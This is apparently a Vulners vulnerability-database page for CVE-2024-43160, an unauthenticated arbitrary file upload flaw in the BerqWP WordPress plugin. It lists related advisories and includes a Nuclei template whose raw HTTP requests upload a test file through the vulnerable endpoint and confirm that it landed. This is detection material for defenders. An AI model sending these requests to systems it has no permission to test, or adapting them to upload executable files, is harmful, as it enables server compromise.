| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Exploit for CVE-2024-43160 | 17 Sep 202404:19 | – | githubexploit | |
| CVE-2024-43160 | 13 Aug 202412:15 | – | attackerkb | |
| CVE-2024-43160 | 13 Aug 202414:36 | – | circl | |
| WordPress plugin BerqWP 代码问题漏洞 | 13 Aug 202400:00 | – | cnnvd | |
| CVE-2024-43160 | 13 Aug 202411:41 | – | cve | |
| CVE-2024-43160 WordPress BerqWP plugin <= 1.7.6 - Unauthenticated Arbitrary File Upload vulnerability | 13 Aug 202411:41 | – | cvelist | |
| CVE-2024-43160 | 13 Aug 202412:15 | – | nvd | |
| WordPress BerqWP plugin <= 1.7.6 - Unauthenticated Arbitrary File Upload vulnerability | 7 Aug 202413:12 | – | patchstack | |
| WordPress BerqWP Plugin <= 1.7.6 is vulnerable to Arbitrary File Upload | 7 Aug 202400:00 | – | patchstack | |
| CVE-2024-43160 | 5 Feb 202512:38 | – | redhatcve |
id: CVE-2024-43160
info:
name: BerqWP <= 1.7.6 - Arbitrary File Upload
author: s4e-io
severity: critical
description: |
The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
impact: |
Unauthenticated attackers can upload arbitrary files to achieve remote code execution on the WordPress server.
remediation: |
Update BerqWP plugin to version 1.7.7 or later.
reference:
- https://github.com/KTN1990/CVE-2024-43160
- https://nvd.nist.gov/vuln/detail/CVE-2024-43160
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-176-unauthenticated-arbitrary-file-uplaod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-43160
cwe-id: CWE-434
epss-score: 0.04624
epss-percentile: 0.9059
metadata:
verified: true
max-request: 3
vendor: BerqWP
product: BerqWP
framework: wordpress
publicwww-query: "/wp-content/plugins/searchpro"
tags: cve,cve2024,file-upload,shell,intrusive,wp,wp-plugin,wordpress,searchpro,vuln
variables:
filename: "{{rand_base(12)}}"
num: "{{rand_int(10000000000, 999999999999999)}}"
flow: |
http(1) && http(2) && http(3)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"/wp-content/plugins/searchpro")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-json/optifer/v1/store-webp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
image="{{base64(num)}}"&url={{filename}}.txt&license_key_hash=d41d8cd98f00b204e9800998ecf8427e
matchers:
- type: dsl
dsl:
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"{{num}}")'
- 'contains(content_type, "text/plain")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100b4cdebd4b01c79ec9863bc1237031fe0a99b0182418a94935aa0b686285adaaf022024c45c1d7826aacbeedd5128c20e2c475e34e7f71c367d5da4c6660c61c0776f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation